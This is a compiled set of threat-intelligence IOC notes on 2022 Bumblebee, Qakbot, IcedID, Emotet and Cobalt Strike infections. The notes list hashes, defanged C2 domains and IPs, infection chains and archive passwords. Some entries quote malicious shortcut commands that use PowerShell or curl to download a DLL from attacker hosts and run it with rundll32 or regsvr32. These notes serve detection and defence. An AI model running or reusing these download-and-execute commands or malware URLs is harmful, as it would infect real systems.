2022-04-05 (MONDAY) - BUMBLEBEE INFECTION WITH COBALT STRIKE 2 | 3 | NOTES: 4 | 5 | - Bumblebee malware associated with threat actor EXOTIC LILY was reported by Google's Threat Analysis Group (TAG) in March 2022. 
6 | 7 | - For more information, see: https://blog.google/threat-analysis-group/exposing-initial-access-broker-ties-conti/ 8 | 9 | - Was not able to recover Cobalt Strike binary from this infection example. 10 | 11 | ASSOCIATED MALWARE: 12 | 13 | - SHA256 hash: a3e023f9666dfacbbc028212682390de436a78e4291c512b0b9f022a05b138f8 14 | - File size: 2,555,904 bytes 15 | - File name: documents-0405-13.iso 16 | - File description: Malicious ISO file with Bumblebee malware 17 | 18 | - SHA256 hash: 9dfb32ed9b5756151623a8049eaa7785bf761601eb6c7165beff489cce31bb08 19 | - File size: 1,199 bytes 20 | - File name: documents.lnk 21 | - File description: Windows shortcut to run Bumblebee DLL 22 | - Shortcut: rundll32.exe setting.dll,IternalJob 23 | 24 | - SHA256 hash: 131f7e18bc3ea50cdcf74b618c24f5ae1b38594f8649d80538566b1cceeec683 25 | - File size: 2,502,144 bytes 26 | - File name: setting.dll 27 | - File description: Windows DLL for Bumblebee malware 28 | - Run method: rundll32.exe setting.dll,IternalJob 29 | 30 | TRAFFIC FROM AN INFECTED WINDOWS HOST: 31 | 32 | - 192.236.198[.]63 port 443 - 192.236.198[.]63 - Bumblebee HTTPS C2 traffic 33 | - 23.108.57[.]23 port 443 - cuhitiro[.]com - Cobalt Strike traffic 34 | -------------------------------------------------------------------------------- /2022-04-14-IOCs-for-aa-Qakbot-with-Cobalt-Strike.txt: -------------------------------------------------------------------------------- 1 | 2022-04-14 (THURSDAY) - AA DISTRIBUTION QAKBOT (QBOT) WITH COBALT STRIKE 2 | 3 | INFECTION CHAIN: 4 | 5 | - email --> link --> zip --> extracted .msi file --> dropped Qakbot DLL --> Qakbot C2 --> Cobalt Strike 6 | 7 | NOTES: 8 | 9 | - Also known as TA577, aa distribution Qakbot started using .msi files in downloaded zip archives as of Monday 2022-04-11. 
10 | - Reference: https://twitter.com/k3dg3/status/1513514251788464132 11 | - Reference: https://twitter.com/Max_Mal_/status/1513539551070937093 12 | 13 | - Saw the same Cobalt Strike C2 domain and IP address on Monday 2022-04-11 for 172.241.27[.]237 using kuxojemoli[.]com. 14 | - Reference: https://twitter.com/malware_traffic/status/1513556366346137605 15 | 16 | ASSOCIATED MALWARE: 17 | 18 | - SHA256: 5c3b39ec6ffbfe05ac0246d98d6ce7287de442896c90d24e256a03da21f3ada9 19 | - File size: 817,162 bytes 20 | - File location: hxxps://geobram[.]com/ist/iseerroaemtefspidnle 21 | - File location: hxxps://geobram[.]com/ist/NO_2950435796.zip 22 | - File name: iseerroaemtefspidnle.zip 23 | - File description: ZIP archive downloaded from link in email 24 | 25 | - SHA256: 2b9861436d994bee6a332cbaf71a9fd6f157089062f414207c9effe84bf556e5 26 | - File size: 977,920 bytes 27 | - File name: 281.msi 28 | - File description: MSI file extracted from above ZIP archive 29 | 30 | - SHA256: f642fe6b372183af134c1c8cd5f806de37dcea27d6eab2ef53663d61795416e0 31 | - File size: 1,399,296 bytes 32 | - File location: C:\Users\[username]\AppData\Local\SetupTest\1.dll 33 | - File description: Windows DLL for Qakbot (aa distribution tag) 34 | - Run method: regsvr32.exe [filename] 35 | 36 | TRAFFIC TO DOWNLOAD THE INITIAL ZIP ARCHIVE: 37 | 38 | - 208.91.198[.]131 port 443 - hxxps://geobram[.]com/ist/iseerroaemtefspidnle 39 | - 208.91.198[.]131 port 443 - hxxps://geobram[.]com/ist/NO_2950435796.zip 40 | 41 | QAKBOT C2 TRAFFIC: 42 | 43 | - 47.158.25[.]67 port 443 - attempted TCP connections 44 | - 45.46.53[.]140 port 2222 - HTTPS traffic 45 | - port 443 - www.openssl[.]org - connectivity check (not inherently malicious) 46 | - 23.111.114[.]52 port 65400 - TCP traffic 47 | - 75.99.168[.]194 port 443 - HTTPS traffic 48 | 49 | COBALT STRIKE TRAFFIC: 50 | 51 | - 172.241.27[.]237 port 443 - kuxojemoli[.]com 52 | -------------------------------------------------------------------------------- 
/2022-04-19-IOCS-for-infection-from-Brazil-malspam.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pan-unit42/tweets/7283e925c974ec1b67de5aa48d19d5c039ac4d7e/2022-04-19-IOCS-for-infection-from-Brazil-malspam.txt -------------------------------------------------------------------------------- /2022-05-03-IOCs-for-Contact-Forms-Bumblebee-and-Cobalt-Strike.txt: -------------------------------------------------------------------------------- 1 | 2022-05-03 (TUESDAY) - CONTACT FORMS CAMPAIGN --> BUMBLEBEE --> COBALT STRIKE 2 | 3 | CHAIN OF EVENTS: 4 | 5 | - Contact form-generated email --> link to URL at storage.googleapis.com --> ISO file download --> Bumblebee infection --> Cobalt Strike activity 6 | 7 | NOTES: 8 | 9 | - "Contact Forms" is a campaign that has distributed IcedID, Sliver, BazarLoader, and more recently Bumblebee malware. 10 | 11 | - This campaign uses a web site's contact form to email recipients messages with malicious links to download malware. 12 | 13 | - The Contact Forms campaign most often uses a DMCA violation notice that directs victims to a "Stolen Images Evidence" web page hosted on a URL at storage.googleapis.com. 14 | 15 | - In 2021 the Contact Forms campaign also used a "DDoS Attack Proof" theme. 
16 | 17 | - An initial write-up about this campaign can be found at: https://www.microsoft.com/security/blog/2021/04/09/investigating-a-unique-form-of-email-delivery-for-icedid-malware/ 18 | 19 | MALWARE RETRIEVED FROM AN INFECTED WINDOWS HOST: 20 | 21 | - SHA256 hash: c632b56628303f523b22a26231ae80836fed54df87c8a004f2d348d1b6f951b2 22 | - File size: 4,521,984 bytes 23 | - File name: StolenImages_Evidence.iso 24 | - File description: ISO file downloaded through link in contact forms email 25 | 26 | - SHA256 hash: 3c600328e1085dc73d672d068f3056e79e66bec7020be6ae907dd541201cd167 27 | - File size: 1,623 bytes 28 | - File location: StolenImages_Evidence.iso\documents.lnk 29 | - File description: Windows shortcut in the above ISO file 30 | - Windows shortcut: %windir%\system32.exe /c start 31 | rundll32.exe mkl2n.dll,KXlNkCkgFC 32 | 33 | - SHA256 hash: 0a9efce2cb38eb9e215d4ea308ccdc711659ab75b124dfd49561d6226c431ac2 34 | - File size: 3,023,872 bytes 35 | - File location: StolenImages_Evidence.iso\mkl2n.dll 36 | - File location: C:\ProgramData\96796b3c800e87fc\d99821d3530f702f.dll 37 | - File description: Bumblebee malware DLL 38 | - Run method: rundll32.exe [filename],KXlNkCkgFC 39 | 40 | - SHA256 hash: 330b74d26d0f25bd9b7cc147c9641241fea4a2a65965039c7a437ef739e51521 41 | - File size: 140 bytes 42 | - File location: C:\ProgramData\96796b3c800e87fc\d99821d3530f702f.vbs 43 | - File description: VBS file made persistent through scheduled task, used to run Bumblebee malware DLL 44 | 45 | MALWARE NOTE: 46 | 47 | - No binaries for Cobalt Strike were found saved to disk during a forensic investigation on the infected Windows host. 
48 | 49 | EXAMPLE OF LINK IN CONTACT FORM-GENERATED EMAIL FOR "STOLEN IMAGES EVIDENCE" PAGE: 50 | 51 | - port 443 - hxxps://storage.googleapis[.]com/sf796cw3zbj6nk.appspot.com/sh/f/pub/m/0/fileyxuMxCXbRc2e.html?f=308238708665803200 52 | 53 | EXAMPLES OF URLS RETRIEVED BY THE ABOVE PAGE THAT RETURN BASE64 TEXT TO GENERATE ISO FILE: 54 | 55 | - 172.67.183[.]217 port 443 - hxxps://baronrtal[.]com/images/logo.jpg 56 | - 172.67.168[.]3 port 443 - hxxps://bunadist[.]com/images/logo.jpg 57 | 58 | BUMBLEBEE C2 TRAFFIC: 59 | 60 | - 45.153.243[.]93 port 443 - 45.153.243[.]93 - HTTPS traffic 61 | 62 | COBALT STRIKE TRAFFIC: 63 | 64 | - 179.60.150[.]125 port 443 - HTTPS traffic 65 | - 172.93.201[.]12 port 443 - cevogesu[.]com - HTTPS traffic 66 | - 23.106.215[.]100 port 443 - titojukus[.]com - HTTPS traffic 67 | - 108.177.235[.]172 port 443 - xemigefav[.]com - HTTPS traffic 68 | -------------------------------------------------------------------------------- /2022-05-17-IOCS-for-aa-distribution-Qakbot-with-Cobalt-Strike.txt: -------------------------------------------------------------------------------- 1 | 2022-05-17 (TUESDAY) - AA DISTRIBUTION QAKBOT (QBOT) LEADS TO COBALT STRIKE 2 | 3 | INFECTION CHAIN: 4 | 5 | - email --> link --> downloaded zip --> extracted shortcut --> Qakbot DLL --> Qakbot C2 --> Cobalt Strike activity 6 | 7 | TRAFFIC TO DOWNLOAD MALICIOUS ZIP ARCHIVE: 8 | 9 | - port 80 - http://meumundocatolico[.]com[.]br/pla/xmmuite 10 | - port 80 - http://meumundocatolico[.]com[.]br/pla/U1810259023.zip 11 | 12 | URL HOSTING QAKBOT DLL: 13 | 14 | - port 443 hxxps://smartleasesonora[.]com/yVuL6RYk/EW.png 15 | 16 | QAKBOT C2 TRAFFIC: 17 | 18 | - 38.70.253[.]226 port 2222 - HTTPS traffic 19 | 20 | COBALT STRIKE TRAFFIC: 21 | 22 | - 23.106.215[.]197 port 443 - rizucem[.]com - HTTPS traffic 23 | - 193.29.13[.]216 port 443 - svfin[.]icu - HTTPS traffic 24 | 25 | NOTES: 26 | 27 | - In April 2022, svfin[.]icu resolved to 193.29.13[.]216 and was reported publicly as Cobalt 
Strike. 28 | 29 | - In today's HTTPS traffic, svfin[.]icu is an at-commonName value in certificate issuer data for the associated HTTPS traffic. 30 | 31 | MALWARE RETRIEVED FROM AN INFECTED WINDOWS HOST: 32 | 33 | - SHA256 hash: f9272801e9f70757819b7d49ebd1b09ec846c1119026aacf5e1ea7f7a77e9125 34 | - File size: 864 bytes 35 | - File name: U1810259023.zip 36 | - File location: hxxp://meumundocatolico[.]com[.]br/pla/U1810259023.zip 37 | - File description: zip archive retrieved from link in email 38 | 39 | - SHA256 hash: 31aff7c4ab72817fc99d95cdde8fb48ff743a92b717a13835ce6410d126a7e0e 40 | - File size: 2,013 bytes 41 | - File name: Z81310.lnk 42 | - File description: Windows shortcut contained in above zip archive 43 | - Shortcut: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 44 | hxxps://smartleasesonora[.]com/yVuL6RYk/EW.png -OutFile $env:TEMP\z222.dll;Start-Process 45 | rundll32 $env:TEMP\z222.dll,DllInstall 46 | 47 | - SHA256 hash: 8a383f890745370e6f256396858a94062600f1efd2d1df36ef8a291e41494277 48 | - File size: 1,841,599 bytes 49 | - File location: hxxps://smartleasesonora[.]com/yVuL6RYk/EW.png 50 | - File location: C:\Users\[username]\AppData\Local\Temp\z222.dll 51 | - File type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows 52 | - File description: DLL file for Qakbot 53 | - Run method: rundll32 [filename],DllInstall 54 | -------------------------------------------------------------------------------- /2022-05-23-IOCs-for-IcedID-and-DarkVNC.txt: -------------------------------------------------------------------------------- 1 | 2022-05-23 (MONDAY) - ICEDID (BOKBOT) INFECTION WITH DARKVNC: 2 | 3 | NOTES: 4 | 5 | - Indications of this infection chain originally appeared last week. 6 | - It apparently started on Monday 2022-05-16. 
7 | - The Windows shortcut file was first reported at https://twitter.com/malwrhunterteam/status/1526557532277424129 8 | - The associated files were still available online, and we used them to infect a vulnerable Windows host on Monday 2022-05-23. 9 | - This infection chain likely used email with a link to the zipped Windows shortcut as an initial infection vector. 10 | 11 | INFECTION CHAIN: 12 | 13 | - URL --> ZIP --> LNK --> HTA --> 64-bit EXE installer for IcedID 14 | 15 | INFECTION CHAIN STEP-BY-STEP: 16 | 17 | - hxxps://hectorcalle[.]com/May-16_2022.zip --> May-16_2022.lnk 18 | - May-16_2022.lnk --> hxxps://hectorcalle[.]com/093789.hta 19 | - hxxps://hectorcalle[.]com/093789.hta --> hxxps://hectorcalle[.]com/listbul.exe 20 | - hxxps://hectorcalle[.]com/listbul.exe --> C:\Users\[username]\listbul.exe 21 | 22 | ICEDID INSTALLER TRAFFIC FOR GZIP BINARY: 23 | 24 | - 94.140.116[.]34 port 80 - hxxp://pilatylu[.]com/ 25 | 26 | ICEDID POST-INFECTION C2 DOMAINS: 27 | 28 | - 45.86.229[.]46 port 443 - guguchrome[.]com - HTTPS traffic 29 | - 45.86.229[.]46 port 443 - attemptersnext[.]site - HTTPS traffic 30 | - 5.196.103[.]151 port 443 - hipnoguard[.]com - HTTPS traffic 31 | - 5.196.103[.]151 port 443 - sawertinoit[.]site - HTTPS traffic 32 | 33 | FOLLOW-UP MALICIOUS TRAFFIC FOR DARK VNC: 34 | 35 | - 88.119.161[.]76 port 8080 - encrypted TCP traffic 36 | 37 | MALWARE/ARTIFACTS: 38 | 39 | - SHA256 hash: 547be6f1aebb777b6b729b7b919bb5f7d7f068299f96b92b0b5e601a080c3720 40 | - File size: 1,206 bytes 41 | - File location: hxxps://hectorcalle[.]com/May-16_2022.zip 42 | - File description: zip archive, presumably called from link in malicious email 43 | 44 | - SHA256 hash: 24ee20d7f254e1e327ecd755848b8b72cd5e6273cf434c3a520f780d5a098ac9 45 | - File size: 2,559 bytes 46 | - File name: May-16_2022.lnk 47 | - File description: Malicious Windows shortcut to install IcedID malware 48 | 49 | - SHA256 hash: f59531b810bcbc677907e9fa2be65187b3ee4cd980f633775cc8b2186f3e83d2 50 | - File 
size: 130,835 bytes 51 | - File location: hxxps://hectorcalle[.]com/093789.hta 52 | - File description: HTA file retrieved by above Windows shortcut 53 | 54 | - SHA256 hash: 1e3d10c3c84d7617692174a1f9ae8a658eabb22c7122ef1c8f37f35641ccf7aa 55 | - File size: 3,000,000 bytes 56 | - File location: hxxps://hectorcalle[.]com/listbul.exe 57 | - File location: C:\Users\[username]\listbul.exe 58 | - File description: IcedID installer retrieved by above HTA file 59 | 60 | - SHA256 hash: 28cea90671b362b0c6408c1a031fb571b70f1086a5f40afb1be843d6123ce898 61 | - File size: 1,337,758 bytes 62 | - File location: hxxp://pilatylu[.]com/ 63 | - File description: gzip binary from pilatylu.com 64 | 65 | - SHA256 hash: dbe9743c9c57247cb9275a23a84909dd78aca59f584df62197bde07cb87bd1ed 66 | - File size: 342,186 bytes 67 | - File location: C:\Users\[username]\AppData\Roaming\LiquidSausage\license.dat 68 | - File description: Data binary used to run persistent IcedID DLL 69 | - File note: First submitted to VirusTotal on 2022-04-15 70 | 71 | - SHA256 hash: 327006b939627d1300906e10ec00cae6092d97929b104af552c2bd18882f7df3 72 | - File size: 994,816 bytes 73 | - File location: C:\Users\[username]\AppData\Local\[username]\fupodb32.dll 74 | - File description: 64-bit DLL for persistent IcedID infection 75 | - Run method: rundll32.exe [filename],#1 --om="LiquidSausage\license.dat" 76 | - File note: Made persistent through scheduled task 77 | -------------------------------------------------------------------------------- /2022-06-07-IOCs-for-Emotet-with-Cobalt-Strike.txt: -------------------------------------------------------------------------------- 1 | 2022-06-07 (TUESDAY) - EMOTET EPOCH 5 INFECTION WITH COBALT STRIKE AND SPAMBOT ACTIVITY 2 | 3 | NOTE: 4 | 5 | - Cobalt Strike domain and IP address previously reported on Twitter by @drb_ra (C2IntelFeedsBot) at: 6 | https://twitter.com/drb_ra/status/1532181243915296768 7 | 8 | ASSOCIATED MALWARE: 9 | 10 | - SHA256 hash: 
6bbce57af634b5a56f4e412c52d987d3c2515089fc82be156c3de564564b25ba 11 | - File size: 72,704 bytes 12 | - File name: 07062022.xls 13 | - File description: Excel file with macro for Emotet epoch 5 14 | 15 | - SHA256 hash: fb81974d0004fb7c6c57d51386b654fa0e9bed01def37090106508f943b69ed3 16 | - File size: 669,116 bytes 17 | - File location: hxxps://chobemaster[.]com/components/GxCs/ 18 | - File location: C:\Users\[username]\haics1.ocx 19 | - File location: C:\Users\[username]\AppData\Local\[random letters]\[random letters].dll 20 | - File description: 64-bit DLL for Emotet epoch 5 21 | - Run method: regsvr32.exe [filename] 22 | 23 | - SHA256 hash: 5d12e2caa2dc7a0669ce5ea96e919f6c6b7669d23534ba64c55df3b63a465ca1 24 | - File size: 669,116 bytes 25 | - File location: hxxps://bencevendeghaz[.]hu/wp-includes/S1mIEUnClr5s8krOm/ 26 | - File location: C:\Users\[username]\haics2.ocx 27 | - File location: C:\Users\[username]\AppData\Local\[random letters]\[random letters].dll 28 | - File description: 64-bit DLL for Emotet epoch 5 29 | - Run method: regsvr32.exe [filename] 30 | 31 | URLS FOR EMOTET EPOCH 5 DLL: 32 | 33 | - hxxps://chobemaster[.]com/components/GxCs/ 34 | - hxxps://bencevendeghaz[.]hu/wp-includes/S1mIEUnClr5s8krOm/ 35 | - hxxp://vibesapparels[.]com/dQa/Qzuqq5TZO/ 36 | 37 | EMOTET C2 TRAFFIC: 38 | 39 | - 58.96.74[.]42 port 443 - HTTPS traffic 40 | - 62.141.45[.]103 port 443 - HTTPS traffic 41 | - 68.183.62[.]61 port 8080 - HTTPS traffic 42 | - 114.79.130[.]68 port 8080 - HTTPS traffic 43 | - 116.125.120[.]88 port 443 - HTTPS traffic 44 | - 128.199.93[.]156 port 8080 - HTTPS traffic 45 | - 134.209.164[.]181 port 8080 - HTTPS traffic 46 | - 159.65.163[.]220 port 443 - HTTPS traffic 47 | - 173.249.25[.]219 port 443 - HTTPS traffic 48 | - 190.107.19[.]180 port 8080 - HTTPS traffic 49 | - 212.83.184[.]188 port 8080 - HTTPS traffic 50 | 51 | COBALT STRIKE TRAFFIC: 52 | 53 | - 37.0.8[.]252 port 443 - lentgenn.com - HTTPS traffic 54 | 55 | SPAMBOT TRAFFIC (ENCRYPTED SMTP): 56 
| 57 | - various IP addresses over TCP ports associated with SMTP like 25, 465, and 587 58 | -------------------------------------------------------------------------------- /2022-06-09-IOCs-from-TA578-Bumblebee-with-Cobalt-Strike.txt: -------------------------------------------------------------------------------- 1 | 2022-06-09 (THURSDAY) - TA578 CONTACT FORMS CAMPAIGN --> BUMBLEBEE --> COBALT STRIKE: 2 | 3 | REFERENCE: 4 | 5 | - https://twitter.com/malware_traffic/status/1534950475690295296 6 | 7 | EXAMPLE OF TA578 CONTACT FORMS CAMPAIGN "STOLEN IMAGES EVIDENCE" PAGE: 8 | 9 | - hxxps://storage.googleapis[.]com/bcxkja6v4u8de4.appspot.com/ri9s/f/d/s/f8bP4VVdWO0WA.html?d=086573710585143249 10 | 11 | URL CALLED BY THE ABOVE "STOLEN IMAGES EVIDENCE" PAGE: 12 | 13 | - hxxps://storage.googleapis[.]com/nvhhkqnv0s8nkz.appspot.com/f/fileGVxZ1t0ssa5C.html 14 | 15 | - NOTE: The above URL returned base64 text used to create a malicious zip archive for this infection 16 | 17 | ASSOCIATED MALWARE: 18 | 19 | - SHA256 hash: 5b56671835254cb265c0e2d967882eadb51a7abafd82fda3105f23ec13eca325 20 | - File size: 897,893 bytes 21 | - File name: StolenImages_Evidence.zip 22 | - File description: Downloaded zip archive from "Stolen Images Evidence" page 23 | 24 | - SHA256 hash: f3525e18d5c7384ddb59903dab5c6518b15140ce20d8c04efe1db951b4fc39cb 25 | - File size: 2,752,512 bytes 26 | - File name: StolenImages_Evidence.iso 27 | - File description: ISO image extracted from the above zip archive 28 | 29 | - SHA256 hash: e105a1d7fae4d0cb63d068b328d83d41e07b7b27b2bfdc65b2e47c5dfb90466b 30 | - File size: 2,061 bytes 31 | - File name: documents.lnk 32 | - File description: Windows shortcut contained in above ISO image 33 | - Command from shortcut: C:\Windows\System32\cmd.exe/c start docum.bat 34 | 35 | - SHA256 hash: f17420ec26a57d29eefd782b046a8c7be41bc1da1d9bf08313e6fc83ccca333e 36 | - File size: 39 bytes 37 | - File name: docum.bat 38 | - File description: Hidden batch file contained in ISO image 
39 | - Batch file content: @start RunDll32 parelmo2.dll,nHqRHTKVae 40 | 41 | - SHA256 hash: f3d6cc38e35b0738ac5968f8c15404bbe17a1cc00cd6af03b99942e3d9174c8e 42 | - File size: 1,261,568 bytes 43 | - File name: parelmo2.dll 44 | - File description: 64-bit DLL for Bumblebee malware 45 | 46 | BUMBLEBEE C2 TRAFFIC: 47 | 48 | - 145.239.30[.]26 port 443 - HTTPS traffic 49 | 50 | HTTPS traffic to suspicious Amazon AWS server: 51 | 52 | - 18.118.156[.]145 port 443 - ec2-18-118-156-145.us-east-2.compute.amazonaws[.]com - HTTPS traffic 53 | 54 | COBALT STRIKE TRAFFIC: 55 | 56 | - 23.82.141[.]226 port 443 - zupeyico[.]com - HTTPS traffic 57 | 58 | SELF-SIGNED CERTIFICATE ISSUER DATA FOR BUMBLEBEE HTTPS C2 TRAFFIC: 59 | 60 | - id-at-countryName=AU 61 | - id-at-stateOrProvinceName=Some-Staste 62 | - id-at-organizationName=Internet Widgits Pty Ltd 63 | 64 | CERTIFICATE ISSUER DATA FOR HTTPS TRAFFIC TO SUSPICIOUS AMAZON AWS SERVER: 65 | 66 | - id-at-countryName=US 67 | - id-at-stateOrProvinceName=KY 68 | - id-at-organizationName=Denesik-Walsh 69 | - id-at-organizationUnitName=system 70 | - id-at-commonName=denesik.walsh.biz 71 | - pkcs-9-at-emailAddress=system@denesik.walsh.biz 72 | 73 | SECTIGO CERTIFICATE ISSUER DATA FOR COBALT STRIKE HTTPS TRAFFIC: 74 | 75 | - id-at-countryName=GB 76 | - id-at-stateOrProvinceName=Greater Manchester 77 | - id-at-localityName=Salford 78 | - id-at-organizationName=Sectigo Limited 79 | - id-at-commonName=Sectigo RSA Domain Validation Secure Server CA 80 | 81 | - NOTE: Sectigo is a legitimate Certificate Authority (CA), and criminals occasionally use Sectigo certificates for their Cobalt Strike servers. 
-------------------------------------------------------------------------------- /2022-06-14-IOCs-from-TA578-Bumblebee-with-Cobalt-Strike.txt: -------------------------------------------------------------------------------- 1 | 2022-06-14 (TUESDAY) - TA578 THREAD-HIJACKED EMAIL --> BUMBLEBEE --> COBALT STRIKE: 2 | 3 | REFERENCE: 4 | 5 | - https://bazaar.abuse.ch/sample/f17744df579de5a9b657299f909d32fd3ef60812f1b0d4f6e7ea518d2f571a39/ 6 | 7 | ASSOCIATED MALWARE: 8 | 9 | - SHA256 hash: f17744df579de5a9b657299f909d32fd3ef60812f1b0d4f6e7ea518d2f571a39 10 | - File size: 956,787 bytes 11 | - File name: June-14-Request-Scan_103_docx.zip 12 | - File description: zip archive attached to email 13 | 14 | - SHA256 hash: 3499d4981c2a23681954b74793976d8d99e097a905bacd2c3d4e77855e90e4d9 15 | - File size: 3,211,264 bytes 16 | - File name: June-14-Request-Scan_103_docx.iso 17 | - File description: ISO image extracted from the above zip archive 18 | 19 | - SHA256 hash: 7ea93d3194137b5e8e11609733b6d1dbefda22cc1e129e25a06e8623f2bbc3e3 20 | - File size: 2,098 bytes 21 | - File name: documents.lnk 22 | - File description: Windows shortcut contained in above ISO image 23 | - Command from shortcut: C:\Windows\System32\rundll32.exe toso3l.dll,LyirJCyvGh 24 | 25 | - SHA256 hash: 2e349b3224cc0d958e6945623098c2d28cc8977e0d45480c0188febbf7b8aa78 26 | - File size: 1,764,864 bytes 27 | - File name: toso3l.dll 28 | - File description: 64-bit DLL for Bumblebee malware 29 | - Run method: rundll32.exe [filename],LyirJCyvGh 30 | 31 | BUMBLEBEE C2 TRAFFIC: 32 | 33 | - 193.233.203[.]156 port 443 - HTTPS traffic 34 | - 39.57.152[.]217 port 440 - attempted TCP connections 35 | - 69.161.201[.]181 port 382 - attempted TCP connections 36 | 37 | COBALT STRIKE TRAFFIC: 38 | 39 | - 172.93.181[.]105 port 443 - hocavopeh[.]com - HTTPS traffic 40 | 41 | SELF-SIGNED CERTIFICATE ISSUER DATA FOR BUMBLEBEE HTTPS C2 TRAFFIC: 42 | 43 | - id-at-countryName=AU 44 | - id-at-stateOrProvinceName=Some-Staste 45 | - 
id-at-organizationName=Internet Widgits Pty Ltd 46 | 47 | SECTIGO CERTIFICATE ISSUER DATA FOR COBALT STRIKE HTTPS TRAFFIC: 48 | 49 | - id-at-countryName=GB 50 | - id-at-stateOrProvinceName=Greater Manchester 51 | - id-at-localityName=Salford 52 | - id-at-organizationName=Sectigo Limited 53 | - id-at-commonName=Sectigo RSA Domain Validation Secure Server CA 54 | 55 | - NOTE: Sectigo is a legitimate Certificate Authority (CA), and criminals occasionally use Sectigo certificates for their Cobalt Strike servers. 56 | -------------------------------------------------------------------------------- /2022-06-21-IOCs-for-AA-distribution-Qakbot-with-DarkVNC-and-Cobalt-Strike.txt: -------------------------------------------------------------------------------- 1 | 2022-06-21 (TUESDAY) - AA DISTRIBUTION QAKBOT (QBOT) WITH DARK VNC AND COBALT STRIKE 2 | 3 | INFECTION CHAIN: 4 | 5 | - Thread-hijacked email --> link --> password-protected zip --> Windows shortcut --> Qakbot --> follow-up malware 6 | 7 | EXAMPLES OF LINKS FROM EMAILS: 8 | 9 | - hxxps://drive.google[.]com/uc?export=download&id=12YCPlGhj4bO0NWSJtS8agl52ox7D8_6G&confirm=t 10 | - hxxps://drive.google[.]com/uc?export=download&id=1fsanLKV8A93QBID-3w4URnl1DGaSvXOW&confirm=t 11 | - hxxps://drive.google[.]com/uc?export=download&id=1KNl9wwEIVZ5FOyn1BruyWwIrCslFkRGp&confirm=t 12 | - hxxps://drive.google[.]com/uc?export=download&id=1ppV4rCVKnDlJVE4WJ9PfPtiThoA0VdnO&confirm=t 13 | - hxxps://drive.google[.]com/uc?export=download&id=1sVNWr2l36_fFBrG0bSDdOMR6IqaXXNuL&confirm=t 14 | - hxxps://drive.google[.]com/uc?export=download&id=1tjQ48mlBKbF4NvzCx-3h_0e6cq_qUQBU&confirm=t 15 | - hxxps://drive.google[.]com/uc?export=download&id=1WOOtmsN4AY7YT3FEXMszp9sJZEu_80aZ&confirm=t 16 | - hxxps://drive.google[.]com/uc?export=download&id=1xCZknxKBantEN9pywyVCzhd8RQUlb663&confirm=t 17 | - hxxps://drive.google[.]com/uc?export=download&id=1XpJ53bzmOLBhicqonqfAvUQZODPOb6tO&confirm=t 18 | - 
hxxps://drive.google[.]com/uc?export=download&id=1yZwjAU90kJUAV1o6RStf9xSLxeS2Dv9x&confirm=t 19 | - hxxps://drive.google[.]com/uc?export=download&id=1YYjRd6O7GCIAoDawI4i6fB2mjjMtSAzm&confirm=t 20 | - hxxps://drive.google[.]com/uc?export=download&id=1ZXle00cAMSdXupJwtBGB-N9OFekAYPiD&confirm=t 21 | 22 | EXAMPLE OF DOWNLOADED ZIP ARCHIVE: 23 | 24 | - SHA256 hash: 311730a296273acfbec85799b25f23b4698c8cc532ca2028a55f31c8b0686b03 25 | - File size: 1,230 bytes 26 | - File name: reiciendisperferendis.zip 27 | - File description: password-protected zip archive downloaded from link in the email 28 | - Password: E98346 29 | 30 | EXTRACTED WINDOWS SHORTCUT: 31 | 32 | - SHA256 hash: c9dfafd3536977289b4bfda1369fbd113a778cf06ac0c01cdc8e00e1c300e774 33 | - File size: 2,093 bytes 34 | - File name: reiciendisperferendis.lnk 35 | - File description: Windows shortcut extracted from the above zip archive 36 | 37 | COMMAND ISSUED BY THE ABOVE SHORTCUT: 38 | 39 | C:\Windows\System32\cmd.exe /q /c echo 'i0' && 40 | ping yrl.net && 41 | MD "%HOMEPATH%\Wc\ItF5" && 42 | curl.exe --output %HOMEPATH%\Wc\ItF5\t3JC.frZL.YXSA hxxps://maagayatrilogistics[.]com/WUK4Q/q.png && 43 | regsvr32 -u "%HOMEPATH%\Wc\ItF5\t3JC.frZL.YXSA" 44 | && ping 0Ev.com 45 | 46 | QAKBOT DLL RETRIEVED BY THE WINDOWS SHORTCUT: 47 | 48 | - SHA256 hash: 26748f1f6c740dc9ce9c480bc0fe49416b90672567cce3d77e4f16bcb92d7662 49 | - File size: 739,934 bytes 50 | - File location: hxxps://maagayatrilogistics[.]com/WUK4Q/q.png 51 | - File location: C:\Users\[username]\Wc\ItF5\t3JC.frZL.YXSA 52 | - File type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows 53 | - Run method: regsvr32.exe [filename] 54 | 55 | QAKBOT DLL PERSISTENT ON THE INFECTED WINDOWS HOST: 56 | 57 | - SHA256 hash: 8680626d35a7528e6025ca2bfc757967847bb4d0ab4c24e56083d739dfbad9dc 58 | - File size: 732,599 bytes 59 | - File location: C:\Users\[username]\AppData\Roaming\Microsoft\Ccnwa\urdvwi.dll 60 | - File type: PE32 executable (DLL) (GUI) Intel 80386, for MS 
Windows 61 | - Run method: regsvr32.exe [filename] 62 | 63 | TRAFFIC FROM THE QAKBOT INFECTION: 64 | 65 | - 192.185.129[.]139 port 443 - hxxps://maagayatrilogistics[.]com/WUK4Q/q.png 66 | - 76.25.142[.]196 port 443 - Qakbot HTTPS C2 traffic 67 | - port 443 - www.openssl[.]org - Connectivity check by infected Windows host 68 | - 23.111.114[.]52 port 65400 - TCP traffic caused by Qakbot 69 | - port 443 - api.ipify[.]org - IP address check by infected Windows host 70 | - various IP addresses over various ports - Email banner traffic/SMTP activity 71 | 72 | TRAFFIC CAUSED BY FOLLOW-UP MALWARE: 73 | 74 | - 78.31.67[.]7 port 443 - DarkVNC traffic 75 | - 190.123.44[.]130 port 443 - trikh[.]icu - Cobalt Strike HTTPS traffic -------------------------------------------------------------------------------- /2022-06-28-IOCs-for-TA578-IcedID-Cobalt-Strike-and-DarkVNC.txt: -------------------------------------------------------------------------------- 1 | 2022-06-28 (TUESDAY) - TA578 THREAD-HIJACKED EMAIL --> ICEDID (BOKBOT) --> DARK VNC & COBALT STRIKE 2 | 3 | ASSOCIATED MALWARE: 4 | 5 | - SHA256 hash: 458526b6a8158b015fc91b35a417ddd8a17a4b1c03c8a46574f44ee7cef4dc5a 6 | - File size: 271,967 bytes 7 | - File name: June-06028_75-Report.zip 8 | - File description: password-protected zip archive attached to TA578 thread-hijacked email 9 | - Password: 78934 10 | 11 | - SHA256 hash: fb220072b9c47db2fe824cc72c1d3073cab37bf9b80d6adbc0911abc58babb11 12 | - File size: 1,966,080 bytes 13 | - File name: June-06028_75-Report.iso 14 | - 